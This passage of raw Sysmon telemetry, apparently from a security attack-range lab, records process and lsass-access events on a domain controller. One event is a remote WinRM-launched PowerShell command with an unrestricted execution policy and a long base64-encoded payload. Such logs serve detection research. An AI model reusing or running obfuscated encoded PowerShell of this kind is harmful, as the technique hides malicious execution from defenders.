Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004748Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.285{D28789B6-7CD8-5FA1-F100-000000008801}884C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CD7-5FA1-EA00-000000008801}3816C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2676 10341000x80000000000000004747Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004746Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004745Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004744Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004743Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004742Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004741Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004740Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004739Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004738Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CD8-5FA1-F000-000000008801}3744C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004737Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7CD8-5FA1-EE00-000000008801}49124636C:\Windows\system32\WinrsHost.exe{D28789B6-7CD8-5FA1-F000-000000008801}3744C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b 154100x80000000000000004736Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.283{D28789B6-7CD8-5FA1-F000-000000008801}3744C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CD8-5FA1-EE00-000000008801}4912C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000004735Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004734Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004733Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004732Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C64-5FA1-1500-000000008801}13361724C:\Windows\system32\svchost.exe{D28789B6-7CD8-5FA1-EE00-000000008801}4912C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000004731Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.258{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CD8-5FA1-EE00-000000008801}4912C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004730Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.258{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CD8-5FA1-EE00-000000008801}4912C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004729Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.242{D28789B6-7CD8-5FA1-ED00-000000008801}45324540C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004728Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.242{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CD8-5FA1-EF00-000000008801}3964C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004727Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.242{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\W